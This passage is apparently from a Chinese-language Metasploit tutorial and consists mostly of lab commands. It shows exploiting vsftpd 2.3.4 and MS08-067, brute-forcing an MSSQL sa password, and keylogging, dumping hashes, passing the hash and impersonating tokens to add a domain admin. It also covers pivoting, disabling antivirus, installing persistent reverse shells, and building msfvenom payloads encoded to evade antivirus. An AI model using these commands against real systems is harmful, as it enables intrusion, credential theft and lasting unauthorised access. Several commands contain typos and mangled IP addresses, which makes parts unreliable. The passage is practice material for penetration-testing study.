<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sT -A -P0 <span class="number">192.168</span><span class="number">.67</span><span class="number">.141</span></span><br></pre></td></tr></table></figure>

<p>发现 22 个开放端口，主机操作系统为 Debian，运行 vsftpd 2.3.4。</p>
<figure class="highlight properties"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">search</span> <span class="string">vsftpd</span></span><br><span class="line"><span class="attr">use</span> <span class="string">exploit/unix/ftp/vsftpd_234_backdoor</span></span><br><span class="line"><span class="attr">show</span> <span class="string">payloads</span></span><br><span class="line"><span class="attr">set</span> <span class="string">PAYLOAD cmd/unix/interact</span></span><br><span class="line"><span class="attr">show</span> <span class="string">oprtions</span></span><br><span class="line"><span class="attr">setg</span> <span class="string">RHOST 192.168.67.141</span></span><br><span class="line"><span class="attr">exploit</span></span><br></pre></td></tr></table></figure>

<p>这是命令执行攻击 ，成功率很高，标注了 excellent。使用了一个 bind 的交互式 shell，在目标主机打开了一个端口，连接到目标主机。</p>
<h3 id="全端口攻击载荷：暴力破解目标开放的端口"><a href="#全端口攻击载荷：暴力破解目标开放的端口" class="headerlink" title="全端口攻击载荷：暴力破解目标开放的端口"></a>全端口攻击载荷：暴力破解目标开放的端口</h3><p>如果攻击的组织内部设置了严格的出站端口过滤，可以使用专用的攻击载荷辅助逐个尝试可用的端口。</p>
<p>以攻击 windows 为例</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">use windows/smb/ms08_067_netapi</span><br><span class="line"><span class="keyword">set</span> LHOST <span class="comment">192.168.67.136</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">RHOSTs 192.168.67.140</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">TARGET 4</span></span><br><span class="line">search <span class="comment">ports</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">PAYLOAD windows</span>/meterpreter/<span class="comment">reverse_tcp_allports</span></span><br><span class="line">exploit <span class="comment">-j</span></span><br><span class="line">sessions <span class="comment">-l -v</span></span><br><span class="line">session <span class="comment">-i 3</span></span><br></pre></td></tr></table></figure>

<p>对所有端口进行了尝试，直到发现放行的段偶。</p>
<h3 id="资源文件"><a href="#资源文件" class="headerlink" title="资源文件"></a>资源文件</h3><p>resource file 指 msfconsole 中包含一些列自动化命令的脚本文件，这是一个可以在 msfconsole中执行的命令列表，列表中的命令顺序执行。资源文件可以简化攻击过程，使用<code>resource</code>命令载入资源文件，或者在OS命令行中使用 <code>-r</code>将资源文件作为 msfconsole 的一个参数 。</p>
<p>创建一个能够显示 metasploit 版本并且载入声音插件的资源文件</p>
<figure class="highlight zephir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">echo</span> version &gt; <span class="keyword">resource</span>.rc</span><br><span class="line"><span class="keyword">echo</span> load sounds &gt;&gt; <span class="keyword">resource</span>.rc</span><br><span class="line">msfconsole -r <span class="keyword">resource</span>.rc</span><br></pre></td></tr></table></figure>

<p>实际环境中可以使用更复杂的资源文件，自动进行攻击，比如自动执行SMB攻击，<code>resource.rc</code>内容如下：</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use explooit/windows/smb/ms80_067_netapi </span><br><span class="line"><span class="keyword">set</span> RHOST <span class="comment">192.168.67.140</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">PAYLOAD windows</span>/meterpreter/<span class="comment">reverse_tcp</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">LHOST 192.168.67.136</span></span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>终端执行</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">resource resource.rc</span><br></pre></td></tr></table></figure>

<p>后面可以使用 Karmetasploit 创建复杂的资源文件。</p>
<h2 id="Meterpreter"><a href="#Meterpreter" class="headerlink" title="Meterpreter"></a>Meterpreter</h2><p>使用 Meterpreter 前需要攻陷系统，来获得一个 meterpreter shell</p>
<h3 id="攻击-Windows-1"><a href="#攻击-Windows-1" class="headerlink" title="攻击 Windows"></a>攻击 Windows</h3><h4 id="攻击-MSSQL"><a href="#攻击-MSSQL" class="headerlink" title="攻击 MSSQL"></a>攻击 MSSQL</h4><p>这次攻击 MSSQL 服务。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nmap -sT -A -P0 <span class="number">192.168</span><span class="number">.67</span><span class="number">.140</span></span><br><span class="line">nmap -sU <span class="number">192.168</span><span class="number">.67</span><span class="number">.140</span> -p1434</span><br></pre></td></tr></table></figure>

<p>这里MSSQL使用了默认的1433端口，如果不是，可以用<code>mssql_ping</code>模块查找MSSQL服务端口。使用<code>mssql_login</code>可以尝试对 sa 用户密码进行破解。</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/mssql/mssql_ping</span><br><span class="line">show <span class="keyword">options</span></span><br><span class="line">setg RHOSTS <span class="number">192.168</span><span class="number">.67</span><span class="number">.140</span></span><br><span class="line">run</span><br><span class="line">use auxiliary/scanner/mssql/mssql_login</span><br><span class="line">show <span class="keyword">options</span></span><br><span class="line"><span class="keyword">set</span> PASS_FILE /usr/<span class="comment">share</span>/set/<span class="comment">src</span>/fattrack/<span class="comment">wordlist.txt</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">THREADS 10</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">VERBOSE false</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">USERNAME sa</span></span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>上面爆破出了 sa 的密码 password123。</p>
<h4 id="xp-cmdshell"><a href="#xp-cmdshell" class="headerlink" title="xp_cmdshell"></a>xp_cmdshell</h4><p><code>xp_cmdshell</code>是MSSQL默认装载的内奸存储程序，可以直接执行操作系统命令。下面使用<code>mssql_payload</code>与<code>xp_cmdshell</code>交互，添加本地管理员，通过可执行文件写入payload。</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">use exploit/windows/mssql/msql_payload</span><br><span class="line">show <span class="keyword">options</span></span><br><span class="line"><span class="keyword">set</span> payload <span class="comment">windows</span>/meterpreter/<span class="comment">reverse_tcp</span></span><br><span class="line">setg <span class="comment">LHOST 192.168.67.136</span></span><br><span class="line">setg <span class="comment">LPORT 443</span></span><br><span class="line">setg <span class="comment">RHOSTS 192.168.67.140</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">PASSWORD password123</span></span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>成功后就得到了一个 meterpreter 会话</p>
<h4 id="meterpreter-基本命令"><a href="#meterpreter-基本命令" class="headerlink" title="meterpreter 基本命令"></a>meterpreter 基本命令</h4><p>获得 meterpreter shell 后，可以利用一些基本命令获得更多信息，使用<code>help</code>可以得到帮助。</p>
<ul>
<li>screenshot ，截屏</li>
<li>sysinfo ，获取系统运行的平台</li>
<li>ps ，获得进程列表</li>
<li>migrate ，迁移到目标进程空间</li>
</ul>
<p>可以获取键盘记录</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">ps 	<span class="comment"># 看到explorer.exe，进程号为1824</span></span><br><span class="line">migrate <span class="number">1824</span> <span class="comment"># 迁移到 explorer.exe 的进程空间</span></span><br><span class="line">run post<span class="regexp">/windows/</span>capture/keylog_recorder <span class="comment"># 获取记录</span></span><br><span class="line">^C <span class="comment"># 一段时间按后使用 CTRL+C 停止，记录保存</span></span><br></pre></td></tr></table></figure>

<h3 id="获得用户名和密码"><a href="#获得用户名和密码" class="headerlink" title="获得用户名和密码"></a>获得用户名和密码</h3><p>Windows 系统存储用户密码哈希值方式一般有 LAN Manager(LM), NTLAN Manager(NTLM), NTLAN Manager v2(NTLMv2)。</p>
<h4 id="使用-Meterpreter-命令获取哈希值"><a href="#使用-Meterpreter-命令获取哈希值" class="headerlink" title="使用 Meterpreter 命令获取哈希值"></a>使用 Meterpreter 命令获取哈希值</h4><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> priv</span><br><span class="line"><span class="keyword">run</span> <span class="keyword">post</span>/windows/gather/hashdump</span><br></pre></td></tr></table></figure>

<p>开头为<code>aad3b</code>的哈希值是一个空的哈希值。</p>
<h3 id="传递哈希值"><a href="#传递哈希值" class="headerlink" title="传递哈希值"></a>传递哈希值</h3><p>虽然得到了哈希值，但很难破解复杂的密码。使用哈希值传递技术可以只用哈希值登录。</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use windows/smb/psexec</span><br><span class="line"><span class="keyword">set</span> PAYLOAD <span class="comment">windows</span>/meterpreter/<span class="comment">reverse_tcp</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">LHOST 192.168.67.136</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">LPORT 443</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">RHOSTS 192.168.67.140</span></span><br><span class="line"><span class="keyword">set</span> <span class="comment">SMBPass &lt;hash&gt;</span></span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<h3 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h3><p>在目标机器上创建新用户bob，运行生成的 payload.exe</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=<span class="number">192.168</span><span class="number">.67</span><span class="number">.136</span> LPORT=<span class="number">443</span> -f exe -o payload.exe</span><br></pre></td></tr></table></figure>

<p>运行后，使用 msfconsole 管理 shell</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/handler</span><br><span class="line"><span class="builtin-name">set</span> PAYLOAD windows/meterpreter/reverse_tcp</span><br><span class="line"><span class="builtin-name">set</span> LHOST 192.168.67.136</span><br><span class="line"><span class="builtin-name">set</span> LPORT 443</span><br><span class="line">exploit</span><br><span class="line"><span class="built_in">..</span>.</span><br><span class="line">getuid</span><br><span class="line">shell</span><br><span class="line">C:\Documents <span class="keyword">and</span> Settings\bob\Desktop&gt;net<span class="built_in"> user </span>bob</span><br><span class="line">^Z</span><br></pre></td></tr></table></figure>

<p>在这里，获得了shell，用net user 命令发现 bob 是 User 组的用户，不是管理员，然后使用 CTRL+Z 保留会话（也可以使用<code>background</code>），稍后使用 <code>sessions -l</code> 和 <code>sessions -i &lt;id&gt;</code>能够回到 meterpreter shell。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> <span class="keyword">priv</span></span><br><span class="line">getsystem</span><br><span class="line">getuid</span><br></pre></td></tr></table></figure>

<p>使用特权模块，然后尝试获取本地管理员或者 SYSTEM 权限，使用 getuid 查看结果。</p>
<h3 id="令牌假冒"><a href="#令牌假冒" class="headerlink" title="令牌假冒"></a>令牌假冒</h3><p>使用 <code>ps</code> 命令后，可以看到 cmd.exe ，进程号2780，我们所在域是 metasploit， 域管理员为 administrator。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">steal_token <span class="number">2780</span></span><br></pre></td></tr></table></figure>

<p>这时 Meterpreter 是以域管理员来运行的。</p>
<p>有时 ps 不能列出域管理员运行的进程，可以使用<code>incognito</code>列举系统上可以使用的令牌。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use incognito</span><br><span class="line">list_tokens -u</span><br><span class="line">impersonate_token METASPLOIT\\Administrator</span><br><span class="line">add_user omgcompromised <span class="symbol">p@</span><span class="number">55</span>word! -h <span class="number">192.168</span><span class="number">.1</span><span class="number">.210</span></span><br><span class="line">add_group_user <span class="string">&quot;Domain Admins&quot;</span> omgcompromised -h <span class="number">192.168</span><span class="number">.1</span><span class="number">.210</span></span><br><span class="line"># <span class="number">192.168</span><span class="number">.1</span><span class="number">.210</span> 是域控制器的地址</span><br></pre></td></tr></table></figure>

<h3 id="跳板攻击"><a href="#跳板攻击" class="headerlink" title="跳板攻击"></a>跳板攻击</h3><h4 id="使用-Meterpreter-进行跳板攻击"><a href="#使用-Meterpreter-进行跳板攻击" class="headerlink" title="使用 Meterpreter 进行跳板攻击"></a>使用 Meterpreter 进行跳板攻击</h4><p>例子中，我们从一个子网攻击一个目标系统，然后通过这个系统建立路由攻击其他及其。首先尝试对 Windows XP 进行攻击，然后以此作为据点，对目标内部网络的一个Ubuntu 系统进行攻击。</p>
<p>假设已经获取了某个服务器的访问权限，需要关注的市如何与目标网络建立连接。使用<code>scripts/meterpreter</code>目录下的 Meterpreter 外部脚本，提供了可以使用的额外脚本。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="builtin-name">run</span> get_local_subnets</span><br><span class="line">background</span><br><span class="line">route <span class="builtin-name">add</span> 192.168.39.0 255.255.255.0 1</span><br><span class="line">route print</span><br></pre></td></tr></table></figure>

<p>首先显示了被控系统上的本地子网，将会话后台运行，在MSF终端中添加路由命令，告知系统将远程网络ID（受控主机的本地子网）通过攻击会话1 路由，然后通过<code>route print</code>显示当前活跃的路由设置。</p>
<p>然后对目标Linux系统进行第二次渗透攻击，使用基于 VSFTPD 的攻击，存在于 Metasploitable 靶机上。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">use exploit<span class="regexp">/unix/</span>ftp/vsftpd_234_backdoor</span><br><span class="line">set PAYLOAD cmd<span class="regexp">/unix/i</span>nteract</span><br><span class="line">set RHOSTS <span class="number">192.168</span>.<span class="number">39.150</span></span><br><span class="line">ifconfig</span><br><span class="line">exploit</span><br><span class="line">cat <span class="regexp">/etc/</span>*release</span><br><span class="line">background</span><br></pre></td></tr></table></figure>

<p>通过 ifconfig 显示网络信息，然后与 RHOSTS 和LHOST对比，可以看到 LHOST 指定的是攻击机的IP地址，RHOST是 目标网络子网的地址。如果希望进一步对内网进行跳板扫描，可以使用 <code>scanner/portscan/tcp</code> 模块，可以使用已建立的路由通道。</p>
<p>使用<code>load auto_add_route</code>命令可以自动化添加路由</p>
<h3 id="使用-Meterpreter-脚本"><a href="#使用-Meterpreter-脚本" class="headerlink" title="使用 Meterpreter 脚本"></a>使用 Meterpreter 脚本</h3><p>通过<code>run &lt;script&gt;</code>可以在 meterpreter 终端中运行扩展脚本。</p>
<ul>
<li>VNC</li>
</ul>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="builtin-name">run</span> vnc</span><br><span class="line"><span class="builtin-name">run</span> screen</span><br><span class="line"><span class="builtin-name">run</span> screen_unlock</span><br></pre></td></tr></table></figure>

<p>获得一个 VNC 连接。</p>
<ul>
<li>迁移进程</li>
</ul>
<p>攻击系统时，使用迁移进程可以进入稳定的，不会关闭的服务进程中，以便维持稳定的系统控制连接。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">run post<span class="regexp">/windows/m</span>anager/migrate</span><br></pre></td></tr></table></figure>

<ul>
<li>关闭杀软</li>
</ul>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">run</span><span class="bash"> killav</span></span><br></pre></td></tr></table></figure>

<ul>
<li>获取系统密码哈希值</li>
</ul>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">run</span><span class="bash"> hashdump</span></span><br></pre></td></tr></table></figure>

<ul>
<li>查看流量</li>
</ul>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">run</span><span class="bash"> packetrecorder -i 1</span></span><br></pre></td></tr></table></figure>

<ul>
<li>获取系统信息</li>
</ul>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">run</span><span class="bash"> scraper</span></span><br></pre></td></tr></table></figure>

<ul>
<li>控制持久化</li>
</ul>
<p>注入 meterpreter 代理，确保重启之后 meterpreter 还能运行，如果是反弹连接方式可以指定连接间隔；绑定方式可以设置在指定时间绑定开放端口。渗透完成后如果不移除，任何攻击者都可以获得这个系统的访问权。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">run persistence -X -i <span class="number">50</span> -p <span class="number">443</span> -r <span class="number">192.168</span><span class="number">.1</span><span class="number">.107</span></span><br><span class="line">use multi/hadler</span><br><span class="line"><span class="keyword">set</span> payload windows/meterpreter/reverse_tcp</span><br><span class="line"><span class="keyword">set</span> lport <span class="number">443</span></span><br><span class="line"><span class="keyword">set</span> lhost <span class="number">192.168</span><span class="number">.1</span><span class="number">.107</span></span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>开机自启动 <code>-X</code>，50秒重连一次<code>-i 50</code>，端口443 <code>-p 443</code>，连接的目的IP <code>-r 192.168.1.107</code>，使用<code>use multi/handler</code>监听。</p>
<p>移除 Meterpreter 代理的方式是删除 <code>HKLM\Software\Microsoft\Windows\CurrentVersion\Run\</code>中的注册表键和<code>C:\WINDOWS\TEMP</code>中的 VBS 文件</p>
<h3 id="将命令行-shell-升级为-Meterpreter"><a href="#将命令行-shell-升级为-Meterpreter" class="headerlink" title="将命令行 shell 升级为 Meterpreter"></a>将命令行 shell 升级为 Meterpreter</h3><p>可以在系统被攻陷时使用<code>session -u</code>将命令行 shell 提升为 Meterpreter。例子中使用MS08-067反弹命令行shell，然后升级为 Meterpreter shell。</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">search</span> ms<span class="number">08</span>_<span class="number">067</span></span><br><span class="line"><span class="attribute">use</span> exploit/windows/smb/ms<span class="number">08</span>_<span class="number">067</span>_netapi</span><br><span class="line"><span class="attribute">set</span> payload windows/shell/reverse_tcp</span><br><span class="line"><span class="attribute">set</span> target <span class="number">4</span></span><br><span class="line"><span class="attribute">setg</span> lhost <span class="number">192.168.6.113</span><span class="number">6</span></span><br><span class="line"><span class="attribute">setg</span> lport <span class="number">8080</span></span><br><span class="line"><span class="attribute">exploit</span> -z</span><br><span class="line"><span class="comment"># session ID: 18</span></span><br><span class="line"><span class="attribute">session</span> -u <span class="number">18</span></span><br><span class="line"><span class="attribute">sessions</span> -i <span class="number">10</span></span><br></pre></td></tr></table></figure>

<h3 id="通过附加的-Railgun-组件操作-Windows-API"><a href="#通过附加的-Railgun-组件操作-Windows-API" class="headerlink" title="通过附加的 Railgun 组件操作 Windows API"></a>通过附加的 Railgun 组件操作 Windows API</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">irb</span></span><br><span class="line"><span class="attribute">client</span>.railgun.user<span class="number">32</span>.MessageBoxA(<span class="number">0</span>,<span class="string">&quot;hello&quot;</span>,<span class="string">&quot;orlde&quot;</span><span class="string">&quot;MB_OK)</span></span><br></pre></td></tr></table></figure>

<p>通过 <code>irb</code>获得一个交互式 Ruby shell，允许用 Ruby 语法与 Meterpreter 交互。</p>
<h3 id="msfvenom"><a href="#msfvenom" class="headerlink" title="msfvenom"></a>msfvenom</h3><p>代替了原来的 msfpayload 和 msfencode，是这两个的结合体。</p>
<h4 id="生成-payload"><a href="#生成-payload" class="headerlink" title="生成 payload"></a>生成 payload</h4><p>需要两个必要参数，<code>-p</code>和<code>-f</code></p>
<ul>
<li><code>-p</code>参数指定特定的payload，可以使用如下命令列出所有可以使用的payload</li>
</ul>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">msfvenom -l payloads</span></span><br></pre></td></tr></table></figure>

<p>也支持使用 <code>-</code> 作为值从标准输入中读取自定义 payload</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">cat</span> payload_file.bin | msfvenom -p - -a x<span class="number">86</span> --platform win -e x<span class="number">86</span>/shikata_ga_nai -f raw</span><br></pre></td></tr></table></figure>

<ul>
<li><code>-f</code>指定 payload 输出格式，例如</li>
</ul>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows<span class="regexp">/meterpreter/</span>bind_tcp -f exe</span><br></pre></td></tr></table></figure>

<p>可以通过以下命令查看支持的格式</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom <span class="comment">--help-formats</span></span><br></pre></td></tr></table></figure>

<p>典型使用</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows<span class="regexp">/meterpreter/</span>reverse_tcp lhost=[Attacke<span class="string">r&#x27;s IP] lport=4444 -f exe -o /tmp/my_payload.exe</span></span><br></pre></td></tr></table></figure>

<h4 id="对payload进行编码"><a href="#对payload进行编码" class="headerlink" title="对payload进行编码"></a>对payload进行编码</h4><p>默认情况下，当使用<code>-b</code>选项时（badchar），编码功能自动启用。其他情况下，必须使用<code>-e</code>选项开启编码功能，例如：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows<span class="regexp">/meterpreter/</span>bind_tcp -e x86/shikata_ga_nai -f raw</span><br></pre></td></tr></table></figure>

<p>使用<code>-l</code>参数可列出可用编码器</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">msfvenom -l encoders</span></span><br></pre></td></tr></table></figure>

<p>有时可以通过<code>-i</code>参数将一个payload多次编码，绕过杀软，但是编码并不是免杀的方案</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">msfvenom</span> -p windows/meterpreter/bind_tcp -e x<span class="number">86</span>/shikata_ga_nai -i <span class="number">3</span></span><br></pre></td></tr></table></figure>

<h4 id="避免使用某些字符"><a href="#避免使用某些字符" class="headerlink" title="避免使用某些字符"></a>避免使用某些字符</h4><p><code>-b</code>参数使用时，某些字符不会出现在payload中，msfvenom会自动使用何时的编码器编码 payload</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows<span class="regexp">/meterpreter/</span>bind_tcp -b <span class="string">&#x27;\x00&#x27;</span> -f raw</span><br></pre></td></tr></table></figure>

<h4 id="提供自定义模板"><a href="#提供自定义模板" class="headerlink" title="提供自定义模板"></a>提供自定义模板</h4><p>默认情况下，msfvenom 使用保存在<code>msf/data/templates</code>下的模板文件，使用<code>-x</code>参数可以指定自己的模板</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -<span class="keyword">p</span> windows/meterpreter/bind_tcp -<span class="keyword">x</span> calc.<span class="keyword">exe</span> -<span class="keyword">f</span> <span class="keyword">exe</span> &gt; <span class="keyword">new</span>.<span class="keyword">exe</span></span><br></pre></td></tr></table></figure>

<p>如果想使用自定义的基于64位操作系统的模板，<code>-f</code>参数中的 exe 需要修改为 exe-only。</p>
<p><code>-x</code>与<code>-k</code>通常同时使用，这样可以将模板中的payload作为新线程运行，但是只适用于较老的机器。</p>
<h4 id="将msfvenom的输出串联（利用管道重定向）"><a href="#将msfvenom的输出串联（利用管道重定向）" class="headerlink" title="将msfvenom的输出串联（利用管道重定向）"></a>将msfvenom的输出串联（利用管道重定向）</h4><p>旧的 msfpayload 和 msfencode 经常串联使用，并且可以按照多种编码顺序排列，msfvenom也可以这样使用</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp <span class="attribute">LHOST</span>=192.168.0.3 <span class="attribute">LPORT</span>=4444 -f<span class="built_in"> raw </span>-e x86/shikata_ga_nai -i 5 | \</span><br><span class="line">msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f<span class="built_in"> raw </span>| \</span><br><span class="line">msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe</span><br></pre></td></tr></table></figure>

<h2 id="免杀技术"><a href="#免杀技术" class="headerlink" title="免杀技术"></a>免杀技术</h2><p>杀软通常通过特征码对文件进行检测，我们可以针对目标创建一个独一无二的 payload。直接攻击时，payload还可以仅在内存中运行，不写入硬盘。</p>
<h3 id="使用-MSF-攻击载荷生成器创建可独立运行的二进制文件"><a href="#使用-MSF-攻击载荷生成器创建可独立运行的二进制文件" class="headerlink" title="使用 MSF 攻击载荷生成器创建可独立运行的二进制文件"></a>使用 MSF 攻击载荷生成器创建可独立运行的二进制文件</h3><p>这里使用 msfvenom 载入 <code>windows/shell_reverse_tcp</code> 载荷，使用<code>--payload-options</code>查看参数</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/shell_reverse_tcp --payload-options</span><br><span class="line">msfvenom -p windows/shell_reverse_tcp LHOST=<span class="number">193.168</span><span class="number">.67</span><span class="number">.136</span> LPORT= <span class="number">443</span> -f exe -o payload1.exe</span><br></pre></td></tr></table></figure>

<p>启动监听</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/<span class="keyword">handler</span></span><br><span class="line"><span class="keyword">set</span> payload windows/shell_reverse_tcp</span><br><span class="line"><span class="keyword">show</span> <span class="keyword">options</span></span><br></pre></td></tr></table></figure>

<h3 id="躲避杀软检测"><a href="#躲避杀软检测" class="headerlink" title="躲避杀软检测"></a>躲避杀软检测</h3><h4 id="使用-MSF-编码器"><a href="#使用-MSF-编码器" class="headerlink" title="使用 MSF 编码器"></a>使用 MSF 编码器</h4><p>用<code>msfvenom -h</code>查看帮助，<code>msfvenom -l encoders</code>列出可用的编码器。将生成的原始数据输入编码器并查看新生成的文件。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/shell_reverse_tcp LHOST <span class="number">192.168</span><span class="number">.671</span><span class="number">.36</span> LPORT=<span class="number">443</span> -e x86/shikata_ga_nai -f exe -o payload2.exe</span><br></pre></td></tr></table></figure>

